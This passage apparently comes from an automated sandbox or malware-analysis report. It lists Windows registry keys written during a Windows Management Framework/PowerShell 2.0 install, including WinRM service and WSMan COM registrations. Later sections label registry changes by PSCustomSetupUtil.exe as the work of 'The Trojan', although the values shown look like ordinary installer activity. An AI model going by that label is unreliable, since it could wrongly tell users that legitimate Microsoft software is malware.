[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ReleaseType" = "Software Update"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 6E 79 95 0C AA 0B C0 6D B4 7C CD DA F8 F4 A8"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.PNF" = "1"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150810"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The process PSCustomSetupUtil.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 1B 21 63 BD EC DA AD CB 96 D8 92 1A 40 47 EA"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "66 23 27 93 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:1068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 D5 1E 20 CB 84 E7 4F 38 C3 EC 6A 07 23 F0 32"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 18 11 99 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 21 24 A5 36 B0 29 62 98 56 BC 18 24 B8 75 0C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C2 70 46 98 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 01 92 32 9A 29 A1 04 34 7C 0B 25 FF AE BA D5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "82 F8 C8 96 2F D3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 C2 83 20 3E 7D 0F 88 6C 53 40 9B BA 78 ED 06"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "7A 1C 68 95 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:3252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 6F 06 5C FE 74 41 AB 9B 1B B8 2B C8 D9 4A B9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "5E 47 C6 91 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 99 B7 22 D7 DB A0 F6 15 FB 5A 2B 51 0A 8F 9C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "10 2F D5 93 2F D3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:1604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 0B BA BB 36 C5 89 39 F3 19 94 B8 65 F2 1F EC"

